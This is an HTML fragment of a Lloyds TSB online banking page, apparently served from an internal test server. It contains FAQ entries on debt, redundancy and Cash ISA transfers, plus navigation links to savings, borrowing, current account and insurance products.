                    <p></p><p>Our&nbsp;<a href="http://www.lloydstsb.com/advice_and_guidance/dealing_with_difficulties/managing_debt/develop_an_action_plan_to_help_manage_debt.asp" title="Managing debt guide: Opens in a new window" class="newwin" tabindex="-1">Managing debt guide</a>&nbsp;can help you get things under control.</p>
<p></p>
                    </div>
            </li>
<li class="ui-accordion-li-fix"><h3 class="qfaqTrigger linkPointer hasLink ui-accordion-header ui-helper-reset ui-state-default ui-corner-all" tabindex="-1" role="tab" aria-expanded="false" title="I&#39;ve been made redundant, what help is available to me?: Use this link to show or hide more information."><span class="ui-icon ui-icon-triangle-1-e"></span>I've been made redundant, what help is available to me?</h3>
            <div class="qfaqCont ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom" role="tabpanel" style="display: none;">
                    <p></p><p>If you've recently been made redundant, or there's a chance that you soon could be, our&nbsp;<a href="http://www.lloydstsb.com/advice_and_guidance/dealing_with_difficulties/redundency/what_you_need_to_know_about_redundency.asp" title="redundancy help and guidance: Opens in a new window" class="newwin" tabindex="-1">redundancy help and guidance</a>&nbsp;can help you get an understanding of your finances and what support is available to you.</p>
<p></p>
                    </div>
            </li>
<li class="ui-accordion-li-fix"><h3 class="qfaqTrigger linkPointer hasLink ui-accordion-header ui-helper-reset ui-state-default ui-corner-all" tabindex="-1" role="tab" aria-expanded="false" title="How do I transfer my Cash ISA?: Use this link to show or hide more information."><span class="ui-icon ui-icon-triangle-1-e"></span>How do I transfer my Cash ISA?</h3>
            <div class="qfaqCont ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom" role="tabpanel" style="display: none;">
                    <p></p><p>You can transfer your existing cash ISA you have with another provider to us. However, please check with your current ISA provider as they may charge a switching fee. All you need to do to transfer your cash ISA&nbsp;is:<br><strong>Step 1</strong> - Open a cash ISA online, if you don't already have one<br><strong>Step 2</strong> - Complete&nbsp;a&nbsp;<a href="https://secure.form.lloydstsb.com/application/isa_transfer.asp" title="transfer request form: Opens in a new window" class="newwin" tabindex="-1">transfer request form</a>&nbsp;</p>
<p></p>
                    </div>
            </li>
</ul>

                    <p><a href="https://lloydstsb.creativevirtual.com/lloydstsb/?startcontext=Help+Centre.Contact+us&sitecontext=ga.Personal" title="More Help &amp; Support: Opens in a new window" target="_blank" class="linkBullet linkMore newwin newfaqwin" tabindex="-1">More Help &amp; Support</a></p></span></div></div></div></div><div class="subPanel quickLinks showHide"><!-- start TS:component_1_quick_links -->   
    


    <h2 class="trigger"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/account_overview_personal/#show0" class="triggerChild" title="Compare and apply: Use this link to show or hide more information.">Compare and apply<span class="toggle"></span></a></h2>
    <div class="pane" id="show0">
        <div class="paneInner">
             
                <ul class="linkList quickLinks clearfix">
            
                <li>
                
                    <h3 class="linkHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/savings_and_investment/" id="lkM21txt006" wt.seg_3="common/promotion/saving/savings0/rhnl/savingan00">Saving</a></h3>
                    <ul>
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp44_00_isa_product/instructionUrl/cashisasaver">Cash ISA Saver</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp44_00_isa_product/instructionUrl/fixedrateisa" id="lkM21txt010" wt.seg_3="common/promotion/saving/cisafixe/rhnl/fixedrat00">Fixed Rate Cash ISA</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp65_00_savings_product/instructionUrl/esaver" id="lkM21txt008" wt.seg_3="common/promotion/saving/esavings/rhnl/esavings00">eSavings Account</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp65_00_savings_product/instructionUrl/easysaver" id="lkM21txt022" wt.seg_3="common/promotion/saving/easysave/rhnl/easysave00">Easy Saver</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp65_00_savings_product/instructionUrl/monthlysaver" title="Monthly Saver">Monthly Saver</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp66_0apply_for_term_deposit/instructionUrl/onlinestepbond" title="Online Step Bond">Online Step Bond</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp66_0apply_for_term_deposit/instructionUrl/fixedbond" title="Online Fixed Bond">Online Fixed Bond</a></li>
                                
                        
                    </ul>
                </li>
             
                
            
                <li>
                
                    <h3 class="linkHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/borrowing_options/" title="Borrowing">Borrowing</a></h3>
                    <ul>
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp39_00_personal_Loan" id="lkM21txt003" wt.seg_3="common/promotion/loans0/loans000/rhnl/personal00">Loans</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="http://www.lloydstsb.com/credit_cards.asp" title="Credit Cards: Opens in a new window" class="newwin">Credit Cards</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="http://www.lloydstsb.com/mortgages.asp" title="Mortgages: Opens in a new window" class="newwin" id="lkM21txt005" wt.seg_3="common/promotion/mortga/mortgage/rhnl/mortgage00">Mortgages</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/planned_overdraft_details/" id="lkM21txt004" wt.seg_3="common/promotion/overdr/overdraf/rhnl/overdraf00">Overdraft</a></li>
                                
                        
                    </ul>
                </li>
             
                </ul><ul class="linkList quickLinks clearfix">
            
                <li>
                
                    <h3 class="linkHeading"><a href="http://www.lloydstsb.com/current_accounts.asp" title="Day-to-day: Opens in a new window" class="newwin">Day-to-day</a></h3>
                    <ul>
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp19_00_current_account" id="lkM21txt021" wt.seg_3="common/promotion/curren/currenta/rhnl/currenta00">Current Account</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp47_00_ava_upgrade" title="Upgrade Current Account" id="lkM21txt014" wt.seg_3="common/promotion/avas00/avagener/rhnl/upgradea00">Upgrade Current Account</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://secure.form.lloydstsb.com/application/account_transfer.asp">Switch your payments to us</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp46_00_travel_money" id="lkM21txt016" wt.seg_3="common/promotion/travel/travelmo/rhnl/travelmo00">Travel Money</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/link/lp_textAlerts" id="lkM21txt017" wt.seg_3="common/promotion/mobile/mobile00/rhnl/mobileba00">Mobile Banking</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/share_dealing/" id="lkM21txt012" wt.seg_3="common/promotion/wealth/sharedea/rhnl/sharedea00">Share Dealing</a></li>
                                
                        
                    </ul>
                </li>
             
                
            
                <li>
                
                    <h3 class="linkHeading"><a href="http://www.lloydstsb.com/insurance.asp" title="Insuring: Opens in a new window" class="newwin" id="lkM21txt018" wt.seg_3="common/promotion/insura/insuranc/rhnl/insuring00">Insuring</a></h3>
                    <ul>
                        
                            
                            
                                    <li class="linkSubHeading"><a href="https://lloydstsb.generalinsurance-system.co.uk/ECommerce/Default.aspx?CommCode=LFIBL5&WT.mc_id=LFIBL5" title="Home insurance: Opens in a new window" class="newwin" id="lkM21txt020">Home insurance</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="http://www.lloydstsb.com/insurance/car/car-insurance/ib-non-dd-cashback.asp" title="Car insurance: Opens in a new window" class="newwin" id="lkM21txt019">Car insurance</a></li>
                                
                        
                            
                            
                                    <li class="linkSubHeading"><a href="http://www.lloydstsb.com/insurance/home/travel.asp" title="Travel Insurance: Opens in a new window" class="newwin">Travel Insurance</a></li>
                                
                        
                    </ul>
                </li>
            
            </ul>
        </div>
    </div>
<!-- end TS:component_1_quick_links --></div>
<input type="hidden" name="txtSessionTerminate" id="txtSessionTerminate" class="sessionTerminate" value="905270279683">

<script type="text/javascript">
    LBG.functions.init();
    
    $(window).load(function(){
        LBG.session.allow();
    });


</script>

    <script src="js/ib.js?a=a"></script>
    </body>
</html>
<!-- 9 served by p17029dtg025:GALAXYServerIntTst04A -->